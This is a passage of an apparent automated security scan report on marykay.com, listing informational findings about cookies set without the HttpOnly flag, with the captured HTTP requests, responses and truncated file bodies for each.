13.224. http://www.marykay.com/Content/HPflash/330m_%20FallTrend_eng.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/330m_%20FallTrend_eng.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Content/HPflash/330m_%20FallTrend_eng.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 57149
Content-Type: application/x-shockwave-flash
Last-Modified: Tue, 30 Aug 2011 17:20:26 GMT
Accept-Ranges: bytes
ETag: "1d37901b3967cc1:d8265"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=42911DD449558CCD78D72F911671B024; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:55 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/

CWS.,p..x..}    <.[...}.N..."IQ.U(....PM..3.E    ...J.vm....sK...fiOE...{...3..QM.{..........9....,.9..L0`j..:.(..    ....$wvv.SjH.$......6>*..:.......3.an.`.[...
.rC@.....n!............NP...D...m..6..F.<..7.
...[SNIP]...

13.225. http://www.marykay.com/Content/HPflash/373_TWNightCmpx.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/373_TWNightCmpx.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Content/HPflash/373_TWNightCmpx.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=921B020F47FD8A57A88269A775E750F4; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 41595
Content-Type: application/x-shockwave-flash
Last-Modified: Wed, 20 Jul 2011 19:27:10 GMT
Accept-Ranges: bytes
ETag: "94cc2051347cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=DC6624BB4A5155A703619388F614872E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:57 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:58 GMT; path=/

CWS.....x...wXS..7...4A..i...;
....*.$Hob. ...U...A...HQ@....*
RU:..w'...y.u.......Fw.g.*3k.....A.P.F.x3......(.....'..3..N2.J*..n..>2`K.....SFP......E.<...
KKK.
........>..}m...}...Xq...}..Q..(.wVl..
...[SNIP]...

13.226. http://www.marykay.com/Content/HPflash/502_mascaraWardrobe.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/502_mascaraWardrobe.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Content/HPflash/502_mascaraWardrobe.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=19C9D0014D75852EFB8C9087C106B6A5; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 72922
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 02 Jun 2011 09:19:28 GMT
Accept-Ranges: bytes
ETag: "7387422c621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=B50F97234F63918E569F658373E875F1; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:55 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:56 GMT; path=/

CWS..F..x..z. ....{q.....D..n..do..{....Rv...eo..G({..QV(..."._...?.....9.y.9.y..y.sn0..\..=..yb@......s... .fi%zCF.......
.I0.xx..rqy{{sz.q:.Ys....pq.r..r.....N..>.N.L..0...............n~...C....X.G.
...[SNIP]...

13.227. http://www.marykay.com/Content/HPflash/502_moc.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/502_moc.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Content/HPflash/502_moc.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 57038
Content-Type: application/x-shockwave-flash
Last-Modified: Tue, 28 Jun 2011 20:41:18 GMT
Accept-Ranges: bytes
ETag: "3640a0bbd335cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=7A24463C46D77F60A5600B87E247B550; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:54 GMT; path=/

CWS..k..x....\SI...Oz.E. M....."E.D..".DJ....AE......WQ.7l.".T.
..b.X...Fi.mIn.jt.......].9g...S.L.7......D....+.......cFj"....(..f..%Q.H{..........C..wT ..a.#@....|.#.#6..;.    ......(.....Ct..:.N...3..
...[SNIP]...

13.228. http://www.marykay.com/Content/HPflash/BoaB_miniAd.swf

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Content/HPflash/BoaB_miniAd.swf

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Content/HPflash/BoaB_miniAd.swf HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/content/hpflash/stage.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2733271E851D12D2-600001058002D751[CE]; TLTHID=5BABE8214E2E52E7EF445991E652AAEE; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 27154
Content-Type: application/x-shockwave-flash
Last-Modified: Thu, 01 Sep 2011 11:38:38 GMT
Accept-Ranges: bytes
ETag: "823f5b19b68cc1:d8265"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=D5A1484C42E60E9E75C52D879D27BB3F; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:54 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:55 GMT; path=/

CWS.0...x....\........!-%.
.(..R..(..JH,%...J.X.    6v+*"`..6v`..".` ..S..,..z..w....s..s..93'.L>.F..:..R..".*..?Kb__.9.........b.LI.a.l#}.....%2.7....    ..a..L...3../.....}.. ...gD...F|..R..T.3....}....e.
...[SNIP]...

13.229. http://www.marykay.com/IMAGES/bkgLong.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /IMAGES/bkgLong.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /IMAGES/bkgLong.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1942
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:18:22 GMT
Accept-Ranges: bytes
ETag: "4fd9e5621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=BA53BB5644EB3C70267713937AE89A33; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

GIF89a.......B<:>87JDC60/HBAD><2,+F@>:43@:9<65XRP8214.-4.,;54710?982,*822C=<WQPGA?@::1+*SMLKEC=66OIHXQO3-,932810XQPYRQ5/.D?>LEDF?>E@><55A;:PIG@98VPNWQOUOMSMKMGEOIGTNLRLJQKIPJHNHFICALFDNGFTNMSLKVPOPJIV
...[SNIP]...

13.230. http://www.marykay.com/Images/Checkout/viewbag/btn_x.png

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Checkout/viewbag/btn_x.png

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Images/Checkout/viewbag/btn_x.png HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 695
Content-Type: image/png
Last-Modified: Thu, 02 Jun 2011 09:23:29 GMT
Accept-Ranges: bytes
ETag: "77524cbc621cc1:d826e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=A9E1A6E04FDA9397D9FB06A3A1E81552; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:48 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:49 GMT; path=/

.PNG
.
...IHDR.....................tEXtSoftware.Adobe ImageReadyq.e<...YIDATx...Kk.Q.....<.......2A.J....Tpa.FS....r......"....,.nJ.L........L.....g:. x.r/w...s.....0.[..;....>l..{.$!.T*.l6.\......
...[SNIP]...

13.231. http://www.marykay.com/Images/Site/FooterBack1.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Site/FooterBack1.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Images/Site/FooterBack1.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1466
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "ebcd3647621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=E80F63564B8C8303276E31A8100ACBE7; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

GIF89a..'...............................................................................................................................................................................................
...[SNIP]...

13.232. http://www.marykay.com/Images/Site/hdottedline.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Site/hdottedline.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Images/Site/hdottedline.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 809
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "b3923b47621cc1:d825c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=5BABE8214E2E52E7EF445991E652AAEE; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:51 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

13.233. http://www.marykay.com/Images/Site/searchbox.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Site/searchbox.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Images/Site/searchbox.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BA53BB5644EB3C70267713937AE89A33; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 952
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "17f53d47621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=88AE95AF4B09A6E0090F8F9802D95C67; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

GIF89a.......xKKlCB|OLqFEb=<Z87f?>sHEwKIoFD|MKzKK\:7|ON^;;oFEfA>^;9wJI\87lEBhC@jCB|OKb?<wKKuJG.ONzMKb=;`;;~ONsFEsHG`=;|MLZ:7|KKsJGd?>mFDmEB\;9.POb;;d?<jC@qHE\:9.PNhC>wJGxMK\;7hA@~OLoFB^:9xKIoEBmCBf?<m
...[SNIP]...

13.234. http://www.marykay.com/Images/Site/vdottedline.gif

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Site/vdottedline.gif

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Images/Site/vdottedline.gif HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=9F32F1D24088FD7A7C1A4C8250D2F93D; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 809
Content-Type: image/gif
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "a77e4747621cc1:d825c"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=AA5C39604E80A1CDD53924B3552910F6; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:51 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:51 GMT; path=/

GIF89a..................................................................................................................................................................................................
...[SNIP]...

13.235. http://www.marykay.com/Images/Site/wholeheader.jpg

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Images/Site/wholeheader.jpg

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Images/Site/wholeheader.jpg HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=0CA8F6134F6BF5C078C5DCA0DFE88F3B; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 13033
Content-Type: image/jpeg
Last-Modified: Thu, 02 Jun 2011 09:20:13 GMT
Accept-Ranges: bytes
ETag: "be14947621cc1:d822e"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=3E2B08524645FEB844AB7DB6BC20BE5E; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:49 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:50 GMT; path=/

......JFIF.....d.d......Ducky.......<......Adobe.d....................    ...    .......

.

..........................................................................................................u....
...[SNIP]...

13.236. http://www.marykay.com/JS/swfobject.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /JS/swfobject.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /JS/swfobject.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 6902
Content-Type: application/x-javascript
Last-Modified: Thu, 02 Jun 2011 09:18:24 GMT
Accept-Ranges: bytes
ETag: "070ef5621cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=CCA92511426CCAC77EAB528D54BE529A; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

/**
* SWFObject v1.4.4: Flash Player detection and embed - http://blog.deconcept.com/swfobject/
*
* SWFObject is (c) 2006 Geoff Stearns and is released under the MIT License:
* http://www.open
...[SNIP]...

13.237. http://www.marykay.com/Menu.css

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Menu.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Menu.css HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/css,*/*;q=0.1
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 4421
Content-Type: text/css
Last-Modified: Thu, 02 Jun 2011 09:18:09 GMT
Accept-Ranges: bytes
ETag: "809efefc521cc1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=69ED8CC0428ECB34AD8AD5AB8137F4A2; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:45 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:46 GMT; path=/

.commentfix{}
/* These styles contain RARELY CHANGED rules used when the Menu control adapter is enabled. */
/* These rules correspond to the "pure CSS menu" technique that have been evolving over t
...[SNIP]...

13.238. http://www.marykay.com/Scripts/HeaderScript.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Scripts/HeaderScript.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set: TLTHID, www.marykay.com. The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Scripts/HeaderScript.js HTTP/1.1
Host: www.marykay.com
Proxy-Connection: keep-alive
Referer: http://www.marykay.com/default.aspx?pid=mk
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=DFDB2FDD45BA94FC283A74BD7C3CBF64; Subsidiary=US; PreviousMoniker=; Moniker=; ConsultantContactID=-9223372036854775808; ASP.NET_SessionId=q323txewi2dkawr3lpswixms; TLTHID=BEE60304423925D85D6C08B50AA3F8E6; www.marykay.com=554376364.20480.0000

Response

HTTP/1.1 200 OK
Content-Length: 1283
Content-Type: application/x-javascript
Last-Modified: Wed, 06 Apr 2011 17:12:25 GMT
Accept-Ranges: bytes
ETag: "80e28bcc7df4cb1:d826e"
Vary: Accept-Encoding
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Set-Cookie: TLTHID=2DE4171146CE3D4441DE1B8AB44DB9C4; Path=/; Domain=.marykay.com
HostName: WDDCEPPWS103
Date: Tue, 06 Sep 2011 16:45:47 GMT
Set-Cookie: www.marykay.com=554376364.20480.0000; expires=Tue, 13-Sep-2011 16:45:47 GMT; path=/

...var headID = document.getElementsByTagName("head")[0];
if (typeof jQuery == 'undefined') {
//alert("Jquery not present");
var newScriptJQuery = document.createElement('script');
new
...[SNIP]...

13.239. http://www.marykay.com/Scripts/jquery-1.4.2.min.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.marykay.com
Path:   /Scripts/jquery-1.4.2.min.js

Issue detail

